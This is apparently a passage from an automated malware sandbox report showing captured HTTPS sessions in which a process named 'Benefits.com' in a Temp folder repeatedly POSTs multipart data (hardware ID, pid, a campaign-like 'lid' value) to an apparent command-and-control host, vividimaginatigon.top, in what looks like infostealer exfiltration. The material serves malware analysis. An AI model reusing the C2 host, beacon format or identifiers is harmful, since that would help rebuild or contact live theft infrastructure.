                                      2025-01-31 18:49:46 UTC1369INData Raw: 44 51 4e 75 4d 32 38 64 78 42 77 66 61 2f 4c 53 47 63 34 33 36 73 68 73 72 6f 46 5a 4b 39 52 75 57 47 46 62 6c 42 5a 6a 75 35 30 2f 44 58 68 35 63 56 72 51 55 42 56 67 74 59 56 63 6a 58 36 70 7a 6e 37 6e 31 52 59 4e 33 58 64 65 50 52 50 56 43 43 61 76 30 54 67 4d 4e 53 73 77 55 39 64 5a 45 6d 71 78 68 56 72 66 4d 65 2f 62 5a 71 71 48 52 43 62 62 65 56 39 72 52 4a 59 52 62 72 32 64 4c 51 6c 31 63 48 73 54 6b 78 77 66 66 2f 4c 53 47 65 34 6e 2f 38 4e 68 71 35 74 64 4c 64 4e 71 58 33 59 4a 32 31 64 35 73 59 42 2f 57 47 4e 6a 5a 31 54 43 45 67 45 6e 74 59 59 5a 6c 58 44 76 77 47 43 67 69 31 67 2b 31 58 70 64 61 55 43 63 45 32 43 31 6b 54 73 45 63 6e 5a 7a 58 39 5a 62 47 32 69 32 67 31 66 45 50 36 6d 48 4a 71 43 56 46 6e 53 51 58 55 6c 6c 52 5a 68 58 64 2f 69
                                      Data Ascii: DQNuM28dxBwfa/LSGc436shsroFZK9RuWGFblBZju50/DXh5cVrQUBVgtYVcjX6pzn7n1RYN3XdePRPVCCav0TgMNSswU9dZEmqxhVrfMe/bZqqHRCbbeV9rRJYRbr2dLQl1cHsTkxwff/LSGe4n/8Nhq5tdLdNqX3YJ21d5sYB/WGNjZ1TCEgEntYYZlXDvwGCgi1g+1XpdaUCcE2C1kTsEcnZzX9ZbG2i2g1fEP6mHJqCVFnSQXUllRZhXd/i
                                      2025-01-31 18:49:46 UTC1369INData Raw: 7a 4e 33 53 35 30 45 57 45 65 35 6e 46 7a 4b 4a 71 76 38 5a 61 6d 44 55 54 71 51 59 32 30 6f 43 5a 6f 4e 4b 4f 36 6f 4a 6b 42 79 66 7a 41 4c 6e 55 6b 66 5a 37 57 51 54 38 6f 38 2b 4d 4a 72 71 36 39 5a 4b 38 5a 2f 58 57 56 59 6e 46 74 6a 75 39 46 78 51 48 4a 72 4d 41 75 64 63 78 39 78 73 61 56 61 33 44 6d 70 68 79 61 67 6d 78 5a 30 6b 45 49 53 64 45 71 46 46 47 65 6e 72 33 39 59 62 45 30 77 57 4d 74 62 43 47 53 6b 67 56 54 42 49 64 65 4a 50 76 50 66 42 48 36 43 4c 6b 30 6d 56 71 70 5a 4b 4c 66 52 5a 7a 6c 73 4d 32 59 54 68 51 35 57 4a 36 44 4b 41 59 31 33 36 74 74 30 6f 59 35 41 4c 35 64 43 62 45 46 66 6e 78 42 34 73 59 59 77 51 44 73 7a 66 78 4f 46 5a 56 68 75 74 5a 46 49 32 7a 33 35 7a 69 61 59 77 78 59 30 6b 43 51 53 55 30 71 62 47 57 2b 67 67 48 49 6e
                                      Data Ascii: zN3S50EWEe5nFzKJqv8ZamDUTqQY20oCZoNKO6oJkByfzALnUkfZ7WQT8o8+MJrq69ZK8Z/XWVYnFtju9FxQHJrMAudcx9xsaVa3DmphyagmxZ0kEISdEqFFGenr39YbE0wWMtbCGSkgVTBIdeJPvPfBH6CLk0mVqpZKLfRZzlsM2YThQ5WJ6DKAY136tt0oY5AL5dCbEFfnxB4sYYwQDszfxOFZVhutZFI2z35ziaYwxY0kCQSU0qbGW+ggHIn
                                      2025-01-31 18:49:46 UTC1369INData Raw: 76 4d 55 52 51 6e 2f 4d 70 4d 78 6a 7a 76 78 48 50 6f 6e 45 41 76 78 6e 73 65 62 6c 69 59 47 79 69 4a 33 33 38 59 4e 53 73 77 5a 74 35 53 46 6d 43 6b 6d 78 54 74 4f 2b 58 4b 61 71 61 4b 46 6d 4b 51 65 68 49 2b 47 74 74 58 62 4b 66 52 5a 31 41 6e 4b 43 55 41 69 67 78 4b 65 50 79 54 47 64 74 77 73 5a 73 6f 35 35 38 57 64 4a 41 37 55 58 52 62 6b 78 52 2b 74 64 59 42 50 6e 52 2b 66 78 2f 54 56 78 68 67 6f 70 78 43 67 54 6a 71 30 33 79 5a 73 33 30 67 31 6e 74 49 59 55 2b 7a 4e 79 6a 34 30 54 42 41 4c 55 6f 77 47 35 31 6a 56 69 65 71 79 67 47 4e 42 65 72 48 61 4b 43 62 52 32 48 34 58 32 68 63 43 37 6b 51 66 66 53 6c 4f 42 42 6b 65 48 31 66 6e 52 4a 59 59 66 4c 53 43 59 4e 77 37 64 67 6d 2f 39 30 45 64 34 55 76 42 54 59 62 69 6c 6c 78 39 6f 64 2f 57 43 63 39 4d
                                      Data Ascii: vMURQn/MpMxjzvxHPonEAvxnsebliYGyiJ338YNSswZt5SFmCkmxTtO+XKaqaKFmKQehI+GttXbKfRZ1AnKCUAigxKePyTGdtwsZso558WdJA7UXRbkxR+tdYBPnR+fx/TVxhgopxCgTjq03yZs30g1ntIYU+zNyj40TBALUowG51jVieqygGNBerHaKCbR2H4X2hcC7kQffSlOBBkeH1fnRJYYfLSCYNw7dgm/90Ed4UvBTYbillx9od/WCc9M
                                      2025-01-31 18:49:46 UTC1369INData Raw: 59 63 66 4c 53 43 6f 4e 77 2b 34 6b 2b 35 38 70 59 49 64 46 2f 58 47 56 62 68 78 46 72 6f 4a 4a 34 50 6b 74 57 66 56 37 59 55 68 39 5a 6a 4b 74 54 33 54 33 6d 7a 69 53 48 69 6b 41 76 37 6b 4a 6c 64 30 36 46 56 55 36 31 68 7a 78 41 4f 7a 4e 6f 45 34 55 63 4f 57 32 69 68 31 62 4b 63 73 6e 4f 63 4b 54 4e 47 47 7a 55 50 41 6f 6d 62 4a 67 61 62 62 69 57 66 53 46 2f 59 33 31 63 32 68 34 34 59 4b 53 4a 47 59 4e 77 35 59 6b 2b 35 34 78 63 50 4e 31 7a 56 53 70 4f 6a 78 41 6f 2b 4e 45 78 51 43 30 7a 63 56 6e 4e 55 52 64 67 2f 6f 78 58 77 33 44 32 68 33 2f 6e 6d 78 5a 30 67 7a 49 53 64 41 6e 4e 56 79 2b 31 67 79 30 47 64 6d 56 7a 46 4f 4e 69 4e 58 57 31 6d 6c 71 50 41 65 54 4e 63 4c 4b 4f 52 69 76 75 51 6e 39 30 54 6f 55 55 4b 6f 65 48 50 41 42 37 64 44 41 64 6e 55
                                      Data Ascii: YcfLSCoNw+4k+58pYIdF/XGVbhxFroJJ4PktWfV7YUh9ZjKtT3T3mziSHikAv7kJld06FVU61hzxAOzNoE4UcOW2ih1bKcsnOcKTNGGzUPAombJgabbiWfSF/Y31c2h44YKSJGYNw5Yk+54xcPN1zVSpOjxAo+NExQC0zcVnNURdg/oxXw3D2h3/nmxZ0gzISdAnNVy+1gy0GdmVzFONiNXW1mlqPAeTNcLKORivuQn90ToUUKoeHPAB7dDAdnU


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449741172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:49:47 UTC283OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=IKYW5VFNS082W5
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 18140
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:49:47 UTC15331OUTData Raw: 2d 2d 49 4b 59 57 35 56 46 4e 53 30 38 32 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 39 38 45 42 38 44 31 44 44 43 33 43 33 36 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 49 4b 59 57 35 56 46 4e 53 30 38 32 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4b 59 57 35 56 46 4e 53 30 38 32 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 49 4b 59 57 35 56 46
                                      Data Ascii: --IKYW5VFNS082W5Content-Disposition: form-data; name="hwid"EA98EB8D1DDC3C3637A891171E8607C0--IKYW5VFNS082W5Content-Disposition: form-data; name="pid"2--IKYW5VFNS082W5Content-Disposition: form-data; name="lid"c2CoW0--cheksa--IKYW5VF
                                      2025-01-31 18:49:47 UTC2809OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                      Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                      2025-01-31 18:49:57 UTC1132INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:49:56 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=r7papluoagptu5mbahqu9s8rcd; expires=Sat, 01 Feb 2025 18:49:47 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2USaDYlKnuIKZmAh%2FHBMLxoPNZbuaO4%2Bi90eiEVDz6J9K84nkP5LRQwsO3PPCyl0jxRZuNYKa7tpWAOL2l7pdm8aSmlBN3dH1yi2sj7PoLFXH2D0tT1q2BDCYSjiAnQB9C9Mq35tswo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe2355990433f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1642&rtt_var=622&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2854&recv_bytes=19103&delivery_rate=1778319&cwnd=222&unsent_bytes=0&cid=2160ea2a28071787&ts=9993&x=0"
                                      2025-01-31 18:49:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-31 18:49:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449742172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:49:57 UTC284OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=N9S1VI3LFIHYWSDD
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 8773
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:49:57 UTC8773OUTData Raw: 2d 2d 4e 39 53 31 56 49 33 4c 46 49 48 59 57 53 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 39 38 45 42 38 44 31 44 44 43 33 43 33 36 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 4e 39 53 31 56 49 33 4c 46 49 48 59 57 53 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 39 53 31 56 49 33 4c 46 49 48 59 57 53 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 4e
                                      Data Ascii: --N9S1VI3LFIHYWSDDContent-Disposition: form-data; name="hwid"EA98EB8D1DDC3C3637A891171E8607C0--N9S1VI3LFIHYWSDDContent-Disposition: form-data; name="pid"2--N9S1VI3LFIHYWSDDContent-Disposition: form-data; name="lid"c2CoW0--cheksa--N
                                      2025-01-31 18:49:58 UTC1137INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:49:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=juk46vctdtljqevvf7unjpaldl; expires=Sat, 01 Feb 2025 18:49:57 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDzrg8VzaRfRINCCCqs7jCEaIQWBe4%2Bqv0pgE5O269xf86hCRboZ%2BRxZBSec8%2Bim89zp%2FP3pUOa4Ni36A7VTGVQ%2BBw3cJQE9vi5vJym8RWnEmv2q7MnJAiAfYO4q%2FXUHX6zZHNGbiR8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe276d8060fa1-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1704&rtt_var=644&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2853&recv_bytes=9715&delivery_rate=1693735&cwnd=252&unsent_bytes=0&cid=e0af12b629233815&ts=627&x=0"
                                      2025-01-31 18:49:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-31 18:49:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449743172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:49:59 UTC280OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=KTQV5QXT9MP
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 20396
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:49:59 UTC15331OUTData Raw: 2d 2d 4b 54 51 56 35 51 58 54 39 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 39 38 45 42 38 44 31 44 44 43 33 43 33 36 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 4b 54 51 56 35 51 58 54 39 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 54 51 56 35 51 58 54 39 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 4b 54 51 56 35 51 58 54 39 4d 50 0d 0a 43 6f 6e
                                      Data Ascii: --KTQV5QXT9MPContent-Disposition: form-data; name="hwid"EA98EB8D1DDC3C3637A891171E8607C0--KTQV5QXT9MPContent-Disposition: form-data; name="pid"3--KTQV5QXT9MPContent-Disposition: form-data; name="lid"c2CoW0--cheksa--KTQV5QXT9MPCon
                                      2025-01-31 18:49:59 UTC5065OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0
                                      Data Ascii: lrQMn 64F6(X&7~`aO@
                                      2025-01-31 18:49:59 UTC1133INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:49:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=dsc5one04u5pr0a074hll4n5ja; expires=Sat, 01 Feb 2025 18:49:59 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SfyOjs0QOMlo8yWTLdIljYjz9T4cLGOvXIYzc1kGasad%2BAnI0cHazMezOUZEDFRMYbS6LGi7eNh0k1b5AgWVZpZsEVyrv%2Bp6QwwAuDy%2FU0yjMaxpT0Ptl98oe12RgtzSvq4jYLMB6E%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe280591243a4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1599&rtt_var=615&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2852&recv_bytes=21356&delivery_rate=1759036&cwnd=232&unsent_bytes=0&cid=a3c9f1533c76434d&ts=720&x=0"
                                      2025-01-31 18:49:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-31 18:49:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449744172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:50:00 UTC283OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=EM8QETX8VFQAGUJ
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 2605
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:50:00 UTC2605OUTData Raw: 2d 2d 45 4d 38 51 45 54 58 38 56 46 51 41 47 55 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 39 38 45 42 38 44 31 44 44 43 33 43 33 36 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 45 4d 38 51 45 54 58 38 56 46 51 41 47 55 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 4d 38 51 45 54 58 38 56 46 51 41 47 55 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 45 4d 38 51
                                      Data Ascii: --EM8QETX8VFQAGUJContent-Disposition: form-data; name="hwid"EA98EB8D1DDC3C3637A891171E8607C0--EM8QETX8VFQAGUJContent-Disposition: form-data; name="pid"1--EM8QETX8VFQAGUJContent-Disposition: form-data; name="lid"c2CoW0--cheksa--EM8Q
                                      2025-01-31 18:50:00 UTC1133INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:50:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=uau0jj1ilknq0epcbakiv172n1; expires=Sat, 01 Feb 2025 18:50:00 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUOXNkRvcKjfjx1iLG0ueeVC7BfqaYojOX7lXlAQTyMuPA3NdUT%2Bd2srry%2BBP5qC67ZSEYJ5QunPIumBsRFW%2FfbAPARWF86rXRjTOFn5nRwSIdsO5HBJjvt3MEOaZXnaihTajA%2BrGaU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe28858f40fa5-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=4072&min_rtt=1683&rtt_var=2223&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2853&recv_bytes=3524&delivery_rate=1734997&cwnd=196&unsent_bytes=0&cid=c636dab5c5f87bbd&ts=538&x=0"
                                      2025-01-31 18:50:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-31 18:50:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449745172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:50:01 UTC285OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=04B1037J7DQ5LY7
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 585303
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 2d 2d 30 34 42 31 30 33 37 4a 37 44 51 35 4c 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 39 38 45 42 38 44 31 44 44 43 33 43 33 36 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 30 34 42 31 30 33 37 4a 37 44 51 35 4c 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 34 42 31 30 33 37 4a 37 44 51 35 4c 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 30 34 42 31
                                      Data Ascii: --04B1037J7DQ5LY7Content-Disposition: form-data; name="hwid"EA98EB8D1DDC3C3637A891171E8607C0--04B1037J7DQ5LY7Content-Disposition: form-data; name="pid"1--04B1037J7DQ5LY7Content-Disposition: form-data; name="lid"c2CoW0--cheksa--04B1
                                      2025-01-31 18:50:01 UTC15331OUTData Raw: 4f 82 66 0b 65 a9 d1 e7 14 29 e7 cb d8 3f 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb 5f c2 73 40 8f b0 ef 6d dd 27 a0 a7 1a b0 83 77
                                      Data Ascii: Ofe)?1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~_s@m'w
